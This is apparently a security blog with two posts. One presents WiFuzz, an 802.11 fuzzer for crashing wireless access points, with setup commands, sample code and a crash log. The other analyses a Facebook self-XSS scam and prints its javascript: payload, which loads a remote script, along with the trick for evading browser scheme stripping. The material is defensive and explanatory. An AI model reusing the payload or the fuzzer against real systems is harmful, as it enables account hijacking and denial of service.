Testing wireless access points

Wireless devices are now ubiquitous, yet despite the wide diffusion of the technology the security of wireless systems still deserves thorough scrutiny, in particular at the level of the 802.11 network stack.

Today we introduce WiFuzz, a very simple but nifty tool for testing wireless access point (AP) devices. WiFuzz generates malformed ("fuzzed") 802.11 frames to trigger corner-case errors in the AP's 802.11 stack.


How does it work?
WiFuzz is written entirely in Python and leverages the Scapy library for packet generation. To use it, the wireless card driver must support frame injection, and the Wi-Fi interface must be put into monitor mode; as an example, with my NIC (iwlagn driver) these commands do the job:
$ sudo rmmod iwlagn
$ sudo modprobe iwlagn
$ sudo ifconfig wlan0 down
$ sudo iwconfig wlan0 mode monitor
$ sudo ifconfig wlan0 up
Only two mandatory parameters are required before starting to fuzz: the fuzzer type, and the SSID of the target AP.

WiFuzz is somewhat of a "stateful" fuzzer: depending on the chosen fuzzer type, it first moves to a suitable 802.11 state before starting to fuzz the AP. As an example, 802.11 Association Requests are fuzzed with the "assoc" fuzzer, which first moves to the "probed" state, then authenticates with the AP ("authenticated" state), and finally starts to fuzz Association packets. The available fuzzers are listed in the following screenshot.

WiFuzz help screen
Fortunately, state transitions are handled transparently by the tool, so you can simply forget about them ;-) For example, to fuzz the AP identified by the "TestMe" SSID the following syntax can be used:
$ sudo python wifuzz.py -s TestMe assoc
To detect AP crashes, WiFuzz periodically listens for Beacon frames from the target access point: if no Beacon is received within the ping timeout, WiFuzz assumes the target has crashed and writes a PCAP test case containing the packets sent in the last fuzz round, so that the crash can be reproduced. Test cases can be replayed with the wireply.py utility.
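As an added example (not WiFuzz's own code), here is a self-contained model of what such a stateful fuzzer does: it probes and authenticates before fuzzing Association Request frames, checks for a Beacon from the target after every round, and saves the fatal round as a test case that a replay function re-sends against a fresh target. Frames are built by hand rather than with Scapy so the example runs offline, and a constructed toy AP (with a deliberately planted bug in its handling of the SSID element's length byte) stands in for both the radio and the target; the addresses, the SSID, the mutation set and the toy bug are all assumptions for illustration, not something observed in a real device.

```python
"""Stateful 802.11 management-frame fuzzer with beacon-based crash detection (added example,
not WiFuzz's code): frames are built by hand, no Scapy, and a constructed ToyAP is the target."""
import random
import struct

BCAST, SSID_MAX = b"\xff" * 6, 32  # broadcast address; an SSID element carries at most 32 octets
ASSOC_REQ, ASSOC_RESP, PROBE_REQ, PROBE_RESP, BEACON, AUTH = 0x0, 0x1, 0x4, 0x5, 0x8, 0xB

def ie(eid, payload, length=None):  # `length` lets a fuzz case lie about the payload size
    return bytes([eid, len(payload) if length is None else length]) + payload

def parse_ies(body):  # -> [(element id, declared length, payload actually present)]
    i, out = 0, []
    while i + 2 <= len(body):
        out.append((body[i], body[i + 1], body[i + 2:i + 2 + body[i + 1]]))
        i += 2 + body[i + 1]
    return out

def mgmt_frame(subtype, da, sa, bssid, body):
    # Frame Control (little-endian; type 0 = management, subtype in bits 4-7), duration, addr1-3, seq ctrl, body
    return struct.pack("<HH", subtype << 4, 0) + da + sa + bssid + b"\0\0" + body

def parse_mgmt(frame):  # -> subtype, addr1, addr2, addr3, body
    return (frame[0] >> 4) & 0xF, frame[4:10], frame[10:16], frame[16:22], frame[24:]

def assoc_req(sta, bssid, ssid, ssid_len=None):  # capabilities, listen interval, SSID, supported rates
    body = struct.pack("<HH", 0x0431, 10) + ie(0, ssid, ssid_len) + ie(1, b"\x82\x84\x8b\x96")
    return mgmt_frame(ASSOC_REQ, bssid, sta, bssid, body)

class ToyAP:
    """Constructed target: answers probe/auth/assoc and "dies" (stops beaconing) on an association
    request whose SSID element declares more than 32 octets, i.e. it trusts the length byte."""
    def __init__(self, ssid, bssid):
        self.ssid, self.bssid, self.alive, self.authed = ssid, bssid, True, set()
    def beacon(self):  # timestamp/interval/capabilities zeroed, then the SSID element
        return mgmt_frame(BEACON, BCAST, self.bssid, self.bssid, bytes(12) + ie(0, self.ssid.encode())) if self.alive else None

    def handle(self, frame):  # reply to one management frame, or None once dead
        sub, _, sta, _, body = parse_mgmt(frame)
        reply = lambda s, b: mgmt_frame(s, sta, self.bssid, self.bssid, b) if self.alive else None
        if sub == PROBE_REQ:
            return reply(PROBE_RESP, bytes(12) + ie(0, self.ssid.encode()))
        if sub == AUTH:
            self.authed.add(sta)
            return reply(AUTH, struct.pack("<HHH", 0, 2, 0))
        if sub == ASSOC_REQ and sta in self.authed:
            if any(e == 0 and ln > SSID_MAX for e, ln, _ in parse_ies(body[4:])):
                self.alive = False  # the toy bug fires
            return reply(ASSOC_RESP, struct.pack("<HHH", 0x0431, 0, 0xC001))
        return None

class StatefulFuzzer:
    def __init__(self, ap, sta, ssid, seed=1):
        self.ap, self.sta, self.ssid, self.rng = ap, sta, ssid, random.Random(seed)
        self.state, self.bssid = "idle", None

    def wait_beacon(self):  # liveness check: BSSID of a beacon announcing our SSID, or None
        f = self.ap.beacon()
        sub, _, _, bssid, body = parse_mgmt(f) if f else (None, None, None, None, b"")
        ours = any(e == 0 and p == self.ssid.encode() for e, _, p in parse_ies(body[12:]))
        return bssid if sub == BEACON and ours else None

    def reach_authenticated(self):  # idle -> probed -> authenticated, as the "assoc" fuzzer does first
        resp = self.ap.handle(mgmt_frame(PROBE_REQ, BCAST, self.sta, BCAST, ie(0, self.ssid.encode())))
        if resp is None or parse_mgmt(resp)[0] != PROBE_RESP:
            raise RuntimeError("no probe response")
        self.bssid, self.state = parse_mgmt(resp)[3], "probed"
        resp = self.ap.handle(mgmt_frame(AUTH, self.bssid, self.sta, self.bssid, struct.pack("<HHH", 0, 1, 0)))
        if resp is None or parse_mgmt(resp)[0] != AUTH:
            raise RuntimeError("open-system authentication failed")
        self.state = "authenticated"

    def mutated_assoc(self):  # one fuzz case: valid frame, lying length byte, or oversized SSID
        kind = self.rng.choice(["valid", "ssid_len", "ssid_long"])
        ssid, ssid_len = self.ssid.encode(), None
        if kind == "ssid_len":
            ssid_len = self.rng.randint(0, 255)
        elif kind == "ssid_long":
            ssid = b"A" * self.rng.randint(33, 200)
        return assoc_req(self.sta, self.bssid, ssid, ssid_len)

    def fuzz_assoc(self, rounds=10, batch=100):  # None if the AP survived, else the fatal round as a test case
        self.reach_authenticated()
        for rnd in range(1, rounds + 1):
            sent = []
            for _ in range(batch):
                sent.append(self.mutated_assoc())
                if self.ap.handle(sent[-1]) is None:  # no reply, like the log's "recv() timeout"
                    break
            if self.wait_beacon() is None:  # WiFuzz's crash test: no beacon within the timeout
                return {"round": rnd, "packet": (rnd - 1) * batch + len(sent), "testcase": sent}
        return None

def replay(testcase, ap, sta, ssid):  # what wireply.py does with the saved PCAP
    StatefulFuzzer(ap, sta, ssid).reach_authenticated()  # the state the case was sent from
    for n, frame in enumerate(testcase, 1):
        ap.handle(frame)
        if ap.beacon() is None:
            return n  # 1-based index of the frame that killed the target
    return None
```

Running `StatefulFuzzer(ToyAP("TestMe", bssid), sta, "TestMe").fuzz_assoc()` returns a dict with the fatal round, the packet number and the frames sent in that round; feeding those frames to `replay()` against a fresh ToyAP returns the index of the frame that kills it, which is the reproduction step the PCAP test case exists for. Against real hardware the ToyAP calls would become Scapy `sendp`/`sniff` over the monitor-mode interface, and the beacon wait would need a real timeout like WiFuzz's 60-second one.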

Use case
Here is a brief example of WiFuzz in action. In this scenario we test the access point with SSID "TestMe" using the "auth" fuzzer.

$ sudo python wifuzz.py -s TestMe auth
Wed Sep 28 10:38:36 2011 {MAIN} Target SSID: TestMe; Interface: wlan0; Ping timeout: 60; PCAP directory: /dev/shm; Test mode? False; Fuzzer(s): auth;
Wed Sep 28 10:38:36 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:38:36 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:38:36 2011 {WIFI} Starting fuzz 'auth'
Wed Sep 28 10:38:36 2011 {WIFI} [R00001] Sending packets 1-100
Wed Sep 28 10:38:50 2011 {WIFI} [R00001] Checking if the AP is still up...
Wed Sep 28 10:38:50 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:38:50 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:38:50 2011 {WIFI} [R00002] Sending packets 101-200
Wed Sep 28 10:39:04 2011 {WIFI} [R00002] Checking if the AP is still up...
Wed Sep 28 10:39:04 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:39:04 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:39:04 2011 {WIFI} [R00003] Sending packets 201-300
Wed Sep 28 10:39:18 2011 {WIFI} [R00003] Checking if the AP is still up...
Wed Sep 28 10:39:18 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:39:19 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:39:19 2011 {WIFI} [R00004] Sending packets 301-400
Wed Sep 28 10:39:42 2011 {WIFI} [R00004] recv() timeout exceeded! (packet #325)
Wed Sep 28 10:39:42 2011 {WIFI} [R00004] Checking if the AP is still up...
Wed Sep 28 10:39:42 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:40:42 2011 {WIFI} [!] The AP does not respond anymore. Latest test-case has been written to '/dev/shm/wifuzz-eK97nb.pcap'

The AP was tested with the "auth" module (the 802.11 Authentication Request fuzzer). WiFuzz stopped receiving frames at packet #325 and, once the 60-second ping timeout expired without a Beacon from the target, declared the AP dead; a PCAP file with all the packets generated since the beginning of the last fuzz round (packets 301-325) was written to "/dev/shm/wifuzz-eK97nb.pcap".

Conclusions
We use WiFuzz in our daily activities, and it has led to the identification of some interesting wireless bugs. The tool is available here and is released under the GPL license, so feel free to contribute!

Facebook malware on the rise

Today many Italian users found links similar to the one depicted below on their Facebook profiles. For non-Italian speakers, the text can be translated as "Facebook security check. To see the video, follow these steps".


When the "Continue" button is pressed, the following form is displayed:


Here is the translation:
  1. Select the address bar
  2. Press 'j' on the keyboard
  3. Press (CTRL+V) and press ENTER
What happens under the hood is quite simple, and similar to other Facebook malware. The link posted on the victim's Facebook profile points to a malicious SWF file (hxxp://www.cowboysaliensstreaming.com/tag/test.swf) which displays the two dialogs depicted above. Once loaded, the SWF also fills the clipboard with the text:

avascript:(a=(b=document).createElement(\'script\')).src=\'hxxp://www.cowboysaliensstreaming.com/tag/fb.php\',b.body.appendChild(a);void(0)

The SWF then asks the user to click on the address bar, press 'j' and then CTRL+V. The clipboard text is deliberately missing its leading 'j': the victim types it, which sidesteps browsers that strip a leading "javascript:" scheme from pasted text, so what ends up in the address bar is:

javascript:(a=(b=document).createElement(\'script\')).src=\'hxxp://www.cowboysaliensstreaming.com/tag/fb.php\',b.body.appendChild(a);void(0)

As a consequence, a piece of JavaScript runs in the context of the Facebook page and can interact with its DOM. The code fragment creates a new HTML <script> element whose source is hxxp://www.cowboysaliensstreaming.com/tag/fb.php and appends it to the document body. The remote script spreads the malware to the victim's Facebook friends and eventually displays some spam links:
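As an added example (not code from the post or from the malware), here is a small triage helper for this kind of clipboard-based self-XSS payload. It reconstructs what lands in the address bar (the key the victim types plus the pasted clipboard text), checks whether that is a javascript: URL, and extracts the external script URLs and hosts the bookmarklet would load. The address-bar model is an assumption modelled on the mitigation Chrome's omnibox applies (a leading "javascript:" is dropped from pasted text), which is what having the victim type the 'j' evades; the sample clipboard text is the one printed above, defanged as there.

```python
"""Triage helper for clipboard-based self-XSS payloads like the one above (added example,
not the post's or the malware's code). It models the address bar, checks for a javascript:
URL and pulls out the external scripts such a payload loads."""
import re

# The clipboard text dropped by the SWF, copied from the post (defanged hxxp, and the
# backslash-escaped quotes exactly as printed there).
CLIPBOARD = (r"avascript:(a=(b=document).createElement(\'script\')).src="
             r"\'hxxp://www.cowboysaliensstreaming.com/tag/fb.php\',b.body.appendChild(a);void(0)")

# `.src = 'url'` with either quote style, tolerating a backslash before the quotes.
SCRIPT_SRC = re.compile(r"""\.src\s*=\s*\\?(['"])(.*?)\\?\1""")

def strip_pasted_scheme(text):
    """Assumed browser mitigation: a leading javascript: scheme is dropped from pasted text."""
    return re.sub(r"^\s*javascript:", "", text, flags=re.IGNORECASE)

def address_bar(typed, clipboard, strip_scheme=True):
    """What the address bar holds after the victim types `typed` and pastes the clipboard."""
    pasted = strip_pasted_scheme(clipboard) if strip_scheme else clipboard
    return typed + pasted

def analyze(url):
    """Return whether `url` is a javascript: URL plus the script URLs and hosts it loads."""
    is_js = url.lstrip().lower().startswith("javascript:")
    scripts = [src for _, src in SCRIPT_SRC.findall(url)] if is_js else []
    hosts = sorted({re.sub(r"^\w+://", "", s).split("/")[0] for s in scripts})
    return {"javascript_url": is_js, "scripts": scripts, "hosts": hosts}
```

`analyze(address_bar("j", CLIPBOARD))` flags the javascript: URL and reports fb.php and its host, which are the indicators to block; `analyze(address_bar("", "j" + CLIPBOARD))` shows why the trick is needed: pasting the whole URL has its scheme stripped and is no longer executable.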


For those who are interested, a copy of the malicious JavaScript code can be found here.

So nothing is really new with this sample: the same techniques have been used several times in the past. What is astonishing is the number of victims: although Internet users should by now be familiar with these trivial threats, more and more (mostly Italian) Facebook users have carefully followed the malware's instructions, without stopping to ask why they should paste a strange string into the address bar to watch a YouTube video.